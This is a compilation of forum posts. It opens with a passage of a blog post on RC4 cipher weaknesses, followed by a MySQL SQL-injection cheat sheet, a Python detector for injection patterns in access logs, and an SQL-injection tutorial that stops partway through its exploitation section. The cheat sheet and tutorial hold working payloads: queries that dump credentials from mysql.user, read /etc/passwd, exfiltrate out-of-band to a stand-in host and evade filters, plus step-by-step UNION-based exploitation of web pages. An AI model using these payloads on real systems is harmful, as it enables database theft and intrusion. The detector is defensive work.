The second approach was adopted for WPA-TKIP, which was proposed as a band-aid replacement for WEP. TKIP was designed to support legacy WEP-capable devices that had internal RC4 hardware, but weren't powerful enough to handle AES. It made a bunch of positive changes to WEP (including adding a larger IV to prevent keystream reuse), but the most notable change was a new custom hash function that creates a per-packet key from an IV and secret key.

As a hash function, the TKIP hash kind of stinks. For one thing, it can be inverted given only about 10 per-packet keys and about 2^32 computation (these days, a few minutes on a TI calculator). However, this isn't as big of a deal as it sounds: pre-image resistance isn't precisely a goal of the TKIP hash, since those per-packet keys themselves should themselves be hard to obtain. Nonetheless, I wouldn't recommend that you mess around with it. If you must use RC4, try a proper hash function. Or better yet, don't use RC4 at all.

Distinguishers

RC4 is just a PRG, and a PRG is secure if its output is indistinguishable from a stream of truly random bits -- to a 'reasonable' adversary who doesn't know the key.** Hence a great deal of RC4 research focuses on the quality of the cipher's PRG.

So is RC4 a good pseudo-random generator? Meh. Given a mere 1.5GB of keystream data, Fluhrer and McGrew presented an algorithm that distinguishes RC4 from random. I already mentioned Mantin and Shamir who cranked this down to about 256 bytes (over various unknown, unrelated keys) by looking at the second output byte. Finally, Mantin noticed the presence of repeating patterns in RC4, which aren't simply dependent on the first few bytes of output, and can be used to distinguish RC4 given about 64MB of keystream. There are, of course, other distinguishing attacks.

But does it matter? Well, sort of. Indistinguishability is an important characteristic of a pseudo-random generator.
If we have it, then the security argument for RC4 as a stream cipher is very simple: to an adversary who can't distinguish the PRG, RC4 encryption is indistinguishable from a one-time pad. Unfortunately the converse isn't true. Just because RC4 output is distinguishable from random doesn't mean that there's a practical attack on the cipher. These results are important mostly because they illustrate the fundamental wonkiness of RC4, wonkiness that doesn't go away just because you drop the first 3,072 bytes. But they don't exactly give us a practical opening into the cipher itself. Yet.

Ok, none of this was very helpful. I just want to know: can I use RC4?

Great question. Look, the upshot is that RC4, if used as recommended (with hashed IVs and/or dropped output and MACs), is perfectly sufficient for securely encrypting messages. Today. The problem is, we never know what the future will bring.

My advice? Don't run with scissors. You can lose an eye that way.

Notes:

* You might argue that RC4 implementations shouldn't use padding in the first place, since (unlike CBC mode encryption with a block cipher) messages don't need to be padded to a multiple of a block size. This is true -- however, I would note that 'padding oracle'-style attacks needn't rely specifically on padding. Padding is just one type of encoding that can leak useful information if used incorrectly. See Jager and Somorovsky's recent result on XML encryption for a great example of this.

** By reasonable, of course, we mean 'computationally limited'. This rules out attacks that require an unrealistically long time, quantum computing, or ESP.

Posted by Matthew Green at 8:11 AM

Source: A Few Thoughts on Cryptographic Engineering: What's the deal with RC4?
  13. [h=5]Usefull Stuff For SQLI[/h]

A handful of useful functions, syntaxes and queries for MySQL. Also known as a MySQL Cheat Sheet.

[h=4]chernabog[/h]

Version:
SELECT VERSION()
SELECT @@version
SELECT @@version_comment
SELECT @@version_compile_machine
SELECT @@version_compile_os

Directories:
SELECT @@basedir
SELECT @@tmpdir
SELECT @@datadir

Users:
SELECT USER()
SELECT SYSTEM_USER()
SELECT SESSION_USER()
SELECT CURRENT_USER()

Current Database:
SELECT DATABASE()

Concatenation:
SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Returns: Hello MySQL and hello world!

Multi-Concat:
#Stacks the row "foo" from the table "bar" together, using the separator "<br />".
#Note: This operation can by default only grab 1024 bytes, and does not allow LIMIT.
#The 1024 byte limit is stored in the @@group_concat_max_len variable.
SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar

Better-Concat:
#CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROUP_CONCAT(),
#which therefore allows you to concat strings together up to the @@max_allowed_packet size,
#instead of @@group_concat_max_len. The default value for @@max_allowed_packet is currently set to
#1048576 bytes, instead of @@group_concat_max_len's 1024.
SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 0,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 1,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 2,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 3,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 4,1)))

Change Collation:
SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from any other collation.
SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.
Wildcards in SELECT(s):
SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) starting with "test".
SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) ending with "test".

Regular Expression in SELECT(s):
#Returns all columns matching the regular expression.
SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'

SELECT Without Duplicates:
SELECT DISTINCT foo FROM bar

Counting Columns:
SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from the table "bar".

Get Amount of MySQL Users:
SELECT COUNT(user) FROM mysql.user

Get MySQL Users:
SELECT user FROM mysql.user

Get MySQL User Privileges:
SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges

Get MySQL User Privileges on Different Databases:
SELECT grantee,table_schema,privilege_type FROM information_schema.schema_privileges

Get MySQL User Privileges on Different Columns:
SELECT table_schema,table_name,column_name,privilege_type FROM information_schema.column_privileges

Get MySQL User Credentials & Privileges:
SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv) FROM mysql.user

Get MySQL DBA Accounts:
SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges WHERE privilege_type='SUPER'
SELECT host,user FROM mysql.user WHERE Super_priv='Y'

Get Databases:
SELECT schema_name FROM information_schema.schemata
SELECT DISTINCT db FROM mysql.db
SELECT DISTINCT table_schema FROM information_schema.columns
SELECT DISTINCT table_schema FROM information_schema.tables

Get Databases & Tables:
SELECT table_schema,table_name FROM information_schema.tables
SELECT DISTINCT table_schema,table_name FROM information_schema.columns

Get Databases, Tables & Columns:
SELECT table_schema,table_name,column_name FROM information_schema.columns

SELECT A Certain Row:
SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
...
SELECT foo FROM bar LIMIT N,1; #Returns row N.

Benchmark (Heavy Query):
#Performs an MD5 calculation of "1" 10000 times.
SELECT BENCHMARK(10000,MD5(1))

Sleep:
#Works only in MySQL 5 and above.
#Sleeps for 5 seconds, returns 0 on success.
SELECT SLEEP(5)

Conversion (Casting):
SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1
SELECT CAST('65' AS CHAR); #Returns: A

Substring:
SELECT SUBSTR('foobar',1,3); #Returns: foo

Hexadecimal Evasion:
SELECT 0x41424344; #Returns: ABCD
SELECT 0x2E; #Returns: .
SELECT 0x3A; #Returns: :

ASCII to Number:
SELECT ASCII('A'); #Returns: 65

Number to ASCII:
SELECT CHAR(65); #Returns: A
SELECT CHAR(89); #Returns: Y
SELECT CHAR(116,101,115,116); #Returns: test

If Statement:
#Returns 1 if the database is running MySQL 5.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);
#Returns 1 if the database is running MySQL 4.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);

Case Statement:
#Returns 1 if the database is running MySQL 5.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END
#Returns 1 if the database is running MySQL 4.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END

Read File(s):
#Requires you to have the File_priv in mysql.user. On error this statement will return NULL.
SELECT LOAD_FILE('/etc/passwd')

Write File(s):
#You must use quotes on the filename!
SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hello World')

Logical Operator(s):
AND, &&; #The AND operator has && as an alternative syntax.
OR, ||; #The OR operator has || as an alternative syntax.
NOT, !; #The NOT operator has ! as an alternative syntax.
XOR; #The XOR operator has no alternative syntax.

Fuzzy Code Comment:
#Code within /*! is executed by MySQL. Additionally, /*! can be used instead of a space as evasion.
SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/

Comments:
SELECT foo, bar FROM foo.bar-- Single line comment
SELECT foo, bar FROM foo.bar/* Multi line comment */
SELECT foo, bar FROM foo.bar# Single line comment
SELECT foo, bar FROM foo.bar;%00 Batched query with an additional NULL-byte. It does not work together with PHP though.

A few evasions/methods to use between your MySQL statements:
CR (%0D); #Carriage Return.
LF (%0A); #Line Feed.
Tab (%09); #The Tab-key.
Space (%20); #Most commonly used. You know what a space is.
Multiline Comment (/**/); #Well, as the name says.
Fuzzy Comment (/*!); #Be sure to end your query with (*/)
Parentheses, ( and ); #Can also be used as separators when used right.

Parentheses instead of space:
#As said two lines above, parentheses can be used as a separator.
SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))

Auto-Casting to Right Collation:
SELECT UNHEX(HEX(USER())); #UNHEX() converts the hexadecimal value(s) to the current collation.

DNS Requests (OOB (Out-Of-Band)):
#For more information check this.
SELECT YourQuery INTO OUTFILE '\\\\www.your.host.com\\?file_to_save_as.txt'

Command Execution:
#If you're on a MySQL 4.X server, it's possible to execute OS commands as long as you're DBA.
#It can be done if you're able to upload a shared object into /usr/lib.
#The file extension is .so, and it must contain a "User Defined Function", UDF.
#Get raptor_udf.c, it's the source-code for just that feature.
#Remember to compile it for the right CPU architecture.
#The CPU architecture can be resolved by this query:
SELECT @@version_machine;

A couple of useful blind queries to fingerprint the database. All of these return either True or False, as in, you either get a result or you don't.

Version:
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53; #MySQL 5
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52; #MySQL 4

Running as root:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=UNHEX(HEX(0x726F6F74)),1,0)=1

Got File_priv:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1

Got Super_priv (Are we DBA):
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1

Can MySQL Sleep:
#This query will return True and should take above 1 second to execute if it's a success.
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1

Can MySQL Benchmark:
SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1

Are we on *NIX:
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47

Are we on Windows:
SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1

Does a certain column exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE column_name LIKE 'your_column' LIMIT 0,1)>0

Does a certain table exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.columns WHERE table_name LIKE 'your_table' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0

Does a certain database exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.columns WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.tables WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db WHERE db LIKE 'your_database' LIMIT 0,1)>0

from: h.ackack(dot)net

Source: Usefull Stuff For SQLI
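The defender's side of this cheat sheet, as an added example that is not part of the original post: a small Python detector for the evasion and probing patterns listed above (fuzzy /*! comments, CR/LF/tab and NUL separators, parentheses instead of spaces, SLEEP and BENCHMARK, information_schema reads, lone quotes), run over a few constructed Apache-style access-log lines. The log lines, the rule names and the function names (normalize_query, analyze_query, analyze_log) are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines; not real traffic and not from the post.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Dec/2011:08:11:02 +0000] "GET /index.php?id=17 HTTP/1.1" 200 5120
10.0.0.5 - - [15/Dec/2011:08:11:09 +0000] "GET /index.php?id=17' HTTP/1.1" 500 312
10.0.0.5 - - [15/Dec/2011:08:11:15 +0000] "GET /index.php?id=-1+UNION(SELECT(1),(2)) HTTP/1.1" 200 4870
10.0.0.5 - - [15/Dec/2011:08:11:21 +0000] "GET /index.php?id=1%0AAND%0AIF((SELECT%0ASLEEP(5))=0,1,0)=1 HTTP/1.1" 200 5120
10.0.0.5 - - [15/Dec/2011:08:11:30 +0000] "GET /index.php?id=1/*!AND*/1=1 HTTP/1.1" 200 5120
10.0.0.9 - - [15/Dec/2011:08:12:01 +0000] "GET /search.php?q=union+station+timetable HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Rules evaluated on the normalized (decoded, comment-stripped, lowercased) query.
RULES = [
    ("union select", re.compile(r"\bunion\b.*\bselect\b")),
    ("boolean tautology", re.compile(r"\b(or|and)\s+[\w']+\s*=\s*[\w']+")),
    ("time-based function", re.compile(r"\b(sleep|benchmark)\b")),
    ("schema enumeration", re.compile(r"\binformation_schema\b|\bmysql\.user\b")),
    ("file access", re.compile(r"\bload_file\b|\binto\s+(out|dump)file\b")),
]


def normalize_query(raw: str) -> str:
    """Undo the separators and comment tricks from the cheat sheet so keyword rules match."""
    s = unquote_plus(raw)                              # %XX and '+' -> characters
    s = re.sub(r"/\*(?!!).*?\*/", " ", s, flags=re.S)  # drop inert /* ... */ comments
    s = re.sub(r"/\*!|\*/", " ", s)                    # /*! ... */ runs on MySQL: keep the body
    s = re.sub(r"[()]", " ", s)                        # parentheses used as separators
    s = re.sub(r"[\x00\r\n\t\f\v ]+", " ", s)          # CR/LF/tab/NUL separators
    return s.strip().lower()


def structural_flags(decoded: str) -> list:
    """Checks that need the decoded but otherwise untouched query."""
    flags = []
    if re.search(r"(--|#|/\*)\s*$", decoded):
        flags.append("trailing comment")
    if decoded.count("'") % 2 == 1 or decoded.count('"') % 2 == 1:
        flags.append("unbalanced quote")
    return flags


def analyze_query(raw_query: str) -> list:
    """Return the names of all rules the query string trips (empty if clean)."""
    hits = []
    norm = normalize_query(raw_query)
    for name, rx in RULES:
        if rx.search(norm):
            hits.append(name)
    hits.extend(structural_flags(unquote_plus(raw_query)))
    return hits


def analyze_log(text: str) -> list:
    """Parse each request line; report (line_no, status, hits) for flagged lines only."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.search(line)
        if not m:
            continue
        query = m.group("target").partition("?")[2]
        hits = analyze_query(query) if query else []
        if hits:
            findings.append((line_no, int(m.group("status")), hits))
    return findings


if __name__ == "__main__":
    for line_no, status, hits in analyze_log(SAMPLE_LOG):
        print(f"line {line_no} status {status}: {', '.join(hits)}")
```

Normalizing before matching is the whole point: the sheet's %0A, /*!...*/ and parenthesis tricks exist precisely to keep "AND 1=1" or "UNION SELECT" from appearing as contiguous tokens, so a detector that only looks at the raw request misses them. The "union station timetable" line is there to show that a bare keyword is not enough to trigger a rule.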
  14. Yes... What is a guy supposed to do at 06:30 AM when he can't sleep? I've been posting since last night.
  15. SQL Injection (detailed)

Tutorial created by ande for www.evilzone.org
Written December 27, 2009. Updated May 29, 2011.

In this tutorial
1.0 What is SQL?
1.1 Types of SQL or SQL engines
1.2 Understanding the SQL structure
1.3 Finding vulnerabilities
1.4 Exploiting vulnerabilities
1.5 Securing vulnerabilities

1.0 What is SQL?

SQL stands for Structured Query Language. It is a way to store, modify and update data securely, quickly and reliably. SQL is mostly used for web sites but can however be used for almost any application and/or service which is in need of storing, editing and/or updating data in a good and structured way.

In this tutorial I will be using PHP as the script language for examples. PHP is a web script engine. It's the most widely used one, it's the best one and it's the one you are most likely to encounter in real life scenarios. Now, you might think: But if I only learn this on one type of script, don't I have to learn all of this for all other types of scripts? (ASP, ASP.NET, Java, Perl, CGI, [...]) No, you don't. The concept remains the same. However, to truly understand SQL injection on various script types, I encourage you and recommend you from the bottom of my heart to learn the languages. You don't have to learn them all, but perhaps the top 3 most used or something like that. At least PHP.

Additionally I will be using MySQL as the SQL engine in examples. Theoretically SQL can be used by any script engine as it is basically just an application listening on a port on a server waiting for commands/instructions. The only requirement is the ability to use the TCP/IP protocol. However, some script engines like PHP and ASP(.net) have pre-made classes and functions for some of the most common SQL engines, making it a whole lot easier to interact with the SQL server.

In order to run PHP scripts (at least in a browser) you are going to need a PHP supported web server.
It is not required to write a single line of code or install anything on your computer to complete this tutorial. But it's a good idea to experiment with all of the elements in this tutorial: PHP, MySQL and a web server (I recommend Apache).

Learn more about PHP: http://php.net | PHP - Wikipedia, the free encyclopedia
Learn more about SQL: SQL - Wikipedia, the free encyclopedia
Learn more about MySQL: http://mysql.com | MySQL Tutorial - Introduction | MySQL - Wikipedia, the free encyclopedia
Learn more about Apache: Apache HTTP Server - Wikipedia, the free encyclopedia

PS. If you want a really quick way of installing all of the elements above, install WAMP for Windows. It's an all-in-one Apache, MySQL and PHP system for Windows. Alternatively, here is a guide to set up Apache + PHP, but no MySQL: Starting PHP scripting - Setting up a PHP environment. In this case you will have to install MySQL yourself, which can be a bit hard if you are a beginner.

1.1 Types of SQL or SQL engines

There are many different variations of SQL. Most of them come from different companies; some are free, some are not. Some are open source, and some are not. It's like everything else really. Some of the different SQL engines are:
Oracle
MSSQL
MySQL
PostgreSQL

I personally use MySQL because it's free and works well with Apache and whatnot. It also has a good syntax. It is also the most used engine, so it's what you will most likely encounter when doing injections. All SQL in this tutorial will be MySQL.

Learn more about MySQL: http://mysql.com | MySQL Tutorial - Introduction | MySQL - Wikipedia, the free encyclopedia

1.2 Understanding the SQL structure

The structure of SQL is divided into: servers, databases, tables, columns and rows. A SQL server is software running on a computer waiting for commands from the console or over the internet (or localhost/LAN). A SQL server consists of databases and can contain as many databases as you want. A database consists of tables.
A table consists of columns and rows. Here at Evilzone we use a local SQL server. One of our databases (an SMF forum database) contains these tables:

smf_attachments
smf_ban_groups
smf_ban_items
smf_boards
smf_board_permissions
smf_calendar
smf_calendar_holidays
smf_categories
smf_collapsed_categories
smf_log_actions
smf_log_activity
smf_log_banned
smf_log_boards
smf_log_errors
smf_log_floodcontrol
smf_log_karma
smf_log_mark_read
smf_log_notify
smf_log_online
smf_log_polls
smf_log_search_messages
smf_log_search_results
smf_log_search_subjects
smf_log_search_topics
smf_log_topics
smf_membergroups
smf_members
smf_messages
smf_message_icons
smf_moderators
smf_package_servers
smf_permissions
smf_personal_messages
smf_pm_recipients
smf_polls
smf_poll_choices
smf_sessions
smf_settings
smf_smileys
smf_themes
smf_topics

The table smf_members will most likely contain information about all the members on the forum. A few of the columns smf_members contains:

ID_MEMBER
memberName
dateRegistered
posts
realName
ICQ
AIM
YIM
MSN
avatar
karma

Now a row is one line with all these columns. I'll try to show you with a little ASCII awesomeness here. This entire thing is a table:

 ______________________________________________________
|____ID_____|___Name_____|____Pass___|______Email_______|
|_____0_____|____ande____|___abcgefg__|__abc@gmail.com___|
|_____1_____|___satan911_ |___abcgefg__|__abc@gmail.com___|
|_____2_____|___abcgefg__ |___abcgefg__|__abc@gmail.com___|
|_____3_____|___abceqfg__ |___abcgefg__|__abc@gmail.com___|
|_____4_____|___affdeqfg__ |___abcgefg__|__abc@gmail.com___|
|_____5_____|___abhhefg__ |___abcgefg__|__abc@gmail.com___|
|_____6_____|___abaaefg__ |___abcgefg__|__abc@gmail.com___|
|___________|____________|___________|_________________|

In this table the fields ID, Name, Pass and Email are columns. The items downwards are rows.
Row1: |_____0_____|____ande____|___abcgefg__|__abc@gmail.com___|
Row2: |_____1_____|___satan911_ |___abcgefg__|__abc@gmail.com___|
Row3: |_____2_____|___abcgefg__ |___abcgefg__|__abc@gmail.com___|
And so on...

That's pretty much it really. Takes a few brain fluctuations before you will memorize this on your own.

Remember: Server(s)->Databases->Tables->Columns and rows

1.3 Finding vulnerabilities

Before moving on now, it is a GOOD idea for you to learn the basics about both PHP and MySQL (at least look up some code). It is not required to be able to perform SQL injections; however, you will find it much easier to perform more advanced injections later on (and you will actually understand what the fuck is going on behind the scenes!). I will also do this tutorial by showing the server side code in PHP and MySQL.

Okay, our target! http://evilzone.org! Let's now try to find a page where our target (http://evilzone.org) uses SQL with user inputs. So you are browsing around on the page. You find these links:

Evilzone - Hacking and Security Community - Index (shows an article)
Evilzone - Hacking and Security Community - Index (shows a contact form)
http://evilzone.org/contact.php?do=submit (you come to this link when you click send on the contact form)

Okay, the most common use of SQL is when looking for things like articles, posts, threads, comments, user information, product information and so on. The link index.php?page=contact is probably not SQL based because it's not normal to load entire pages from SQL (it can be done though); this link is more likely to be vulnerable to RFI or LFI. But you should still try it nonetheless. The link index.php?do=submit might contain SQL however; then it is most likely a POST SQL injection, which I won't cover in this tutorial. It's very normal to save this kind of information in SQL. Now! The link index.php?id=17! This link almost certainly uses SQL. This is a very common thing to use SQL for.
The SQL query for this case would look a lot like this:

SELECT * FROM articles WHERE id='17'

What this does is, it asks the SQL server for all data (*) where the article's ID = 17. Let's say the article table has an ID, subject and text column. The SQL server will then return the id, subject and text data from the table 'articles' where ID is equal to 17. This is the normal way. This is what it does if a normal user browses the page. However, what if we...

Let's try to add a ' to the end of the link so the link becomes http://evilzone.org/index.php?id=17'

Now the SQL query would look something like this:

SELECT * FROM articles WHERE id='17''

This won't work very well, two 's? The SQL server doesn't understand this, so it will now return an error message instead of the data of the article it normally would. So the page will now output something like this (where the article used to be):

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Error no:xxxx

Now, if you are not getting such an error message (any error message is good, it doesn't need to be 100% like the one above), but you are getting a blank page (either in the form of a totally white blank page or a page with no content at the places where there used to be content without the error prefix (')), no worries. It can still be vulnerable. In a lot of cases, the page won't return any error messages, but there can still be an error behind the scenes, which means it's still vulnerable. Additionally, the ' character is not always the right one to use, or is not always enough to cause an error. Further testing is required to determine if the target is vulnerable. On top of that, sometimes, instead of displaying an error message or a blank page, it can do things like redirecting to the main page or something similar.
If you are getting an error message you can jump to the next chapter (1.4 Exploiting vulnerabilities). I do however recommend reading this chapter through tho. Up to you. You should know what to do when no error message appears.

To determine if a target is vulnerable when it does not output any error message from just adding a ' to the link, you need to first try some other characters; if still no error message, you need to try a few other techniques. Continue reading.

Other error prefixes (like the ') are:
Quote:
"
\
/*
'/*
"/*
'--
"--
';
";
--
;

If none of the above characters create an error, I highly doubt you will ever get one. Let's move on to some other techniques.

If you are getting a blank page (either a totally white one or a page with no content where there used to be content without any error prefix), we need to try to "join" the query instead of creating an error. You can do this in a few different ways. Here are the ones I recommend:
Quote:
+order+by+99999
+or+1=2
+and+1=2

Don't mind the + sign, it's the equivalent of a space, but if you put a space in your URL, it will become %20, which is a lot harder to read than +.

Now, you use the 3 query injections like this:

Using +order+by+x
The whole point here is to see if we can order the result by something.
First, take your URL: index.php?id=17
Then just try adding +order+by+1
If the page now returns normally, try adding +order+by+99999
If the page now does not load normally, you might have a vulnerable page.
Explanation: +order+by+1 will order the returning results from the MySQL server by column 1. The column 1 must exist because a table cannot have 0 columns. But the +order+by+99999 will try to order the results by column nr 99999. This column cannot possibly exist, because that is way over the maximum possible columns in a table. Therefore, this should create an error (or return nothing).
Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +order+by+x in combination with adding ' and " before +order+by+x.
Examples:
'+order+by+1
"+order+by+1/*
'+order+by+1'--
+order+by+1/*
[...]

Using +or+x=x
The whole point here is to see if we can trick the SQL server into making a question true no matter what.
First, take your URL: index.php?id=17
Then change the number (or whatever your URL has as value) into something completely different from its original value. Because this is a number, we will change it into -1. Most likely the SQL server does not have an article with the ID -1.
Our URL now looks like this: index.php?id=-1
Then just try adding +or+1=1
If the page now returns normally, try adding +or+1=2
If the page now does not load normally, you might have a vulnerable page.
Explanation: +or+1=1 will always return true. In this example with the query I showed you above, this will make the entire query something like this:
Code:
SELECT * FROM articles WHERE id='-1' or 1=1

So, the SQL server will return all articles where 1=1! This also means you will most likely not get the same article you got the first time, but rather the first article in the database. Or you will get all articles on the same page. Nonetheless, we got ourselves a vulnerable page!
Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +or+1=1 in combination with adding ' and " before +or+1=1. Also try 'a'='a and "a"="a instead of 1=1 (yes, without the last ' and ").
Examples:
'+or+1=1
'+or+'a'='a
+or+1=1/*
[...]

Using +and+x=x
The whole point here is to set another condition in the query to see if we can affect the query at all.
First, take your URL: index.php?id=17
Then just try adding +and+1=1
If the page now returns normally, try adding +and+1=2
If the page now does not load normally, you might have a vulnerable page.
Explanation: +and+1=1 will set another requirement in the query.
The query will become like this:
Code:
SELECT * FROM articles WHERE id='17' and 1=1

But when you put +and+1=2 the query becomes like this:
Code:
SELECT * FROM articles WHERE id='17' and 1=2

This will of course never be true, because 1 will never be equal to 2. So, if you are able to set your own requirements in the query, we can also do an information retrieval injection, which in the end is what SQL injection is all about: getting information you are not supposed to.
Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +and+x=x in combination with adding ' and " before +and+x=x. Also try 'a'='a and "a"="a instead of 1=1 (yes, without the last ' and ").
Examples:
'+and+1=1
'+and+1=1/*
"+and+'a'='a
'+and+"a"="a
[...]

If you, after using at least one of the above techniques, got no indications that the page could be vulnerable, it probably is not vulnerable. Find a new URL!

PS: If you actually learn MySQL syntax and SQL logic you won't have to do as much trial and error as I have described in the techniques above. You will understand what the different prefixes do and when they are necessary/required/possible.

1.4 Exploiting vulnerabilities

Once you have found a vulnerable link it is pretty straightforward. (Well, can be at least. Your injection could be blind and that will make your life a lot harder. Blind injections are NOT covered in this tutorial.)

Just a quick description of blind SQL injection (credits to owasp.org):
Quote:
Overview
When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather than getting a useful error message, they get a generic page specified by the developer instead.
This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements.

Back to our vulnerable link. It is a good idea to try to visualize what the SQL query looks like. In this case it is pretty easy. But in more advanced injections this really helps out. So again, the query looks like this:
Code:
SELECT * FROM articles WHERE id='ID'<-INJECTION GOES HERE

The first thing we need to do is find out how many columns there are in the table 'articles'. This is because we are going to use the UNION ALL SELECT command. What this UNION ALL SELECT command does is that it allows you to SELECT something in the database two times within the same query; it will then return the data of both the SELECT commands as if it was one query. So.. In this case we know that the table got 3 columns (ID, subject, text). If we don't know this, there are two things you can do. You can do it by using the ORDER BY command or you can just try it out until your query works. However, I would normally go for the ORDER BY command as this does not create lots of nasty logs and it's faster if it's more than 5 columns or so.

The ORDER BY command does exactly what it sounds like. It orders things alphabetically, numerically or by date/time. It can order by name or offset of a column. That means you can do ORDER BY ID or ORDER BY 1; this will be the same if the column ID is the first column. That again means that we can find out how many columns the table got by trying to order by offsets until we get an error or blank page, starting at something like 5. So here we go:
TIP: Use + instead of space, makes it much cleaner.
Evilzone - Hacking and Security Community - Index : Returns blank page
Evilzone - Hacking and Security Community - Index : Returns normal page
Evilzone - Hacking and Security Community - Index : Returns blank page
Evilzone - Hacking and Security Community - Index : Returns normal page

Okay, so 4 is too high and 2 is too low because 3 obviously worked. Now we know the table got 3 columns!

Now we are almost ready to start getting some juicy data. But I have kinda cheated for you guys. Because normally we don't know what the names of the columns are; I just said they are named ID, subject and text. So we need to look this up. Before we can look up what the column names are, we need to find out what version of MySQL the server is running. The newest one is 5.*** and the one you MIGHT come by is 4.***

We can use the UNION ALL SELECT command already, however it's pointless for data extraction without the column names (actually it's not even possible). But we can get the version without the names. This is what you need to do now:
Evilzone - Hacking and Security Community - Index

There we go, now we used the UNION ALL SELECT command. We do 1,2,3 because it is 3 columns. If it was 5 you will have to do 1,2,3,4,5 and so on... The page now should/may output "2" as subject and "3" as the article text. 1 should not be there because the ID is probably not printed to the page.

If the page outputs "2" and "3", then great! Skip past the next text block. If not, read this:
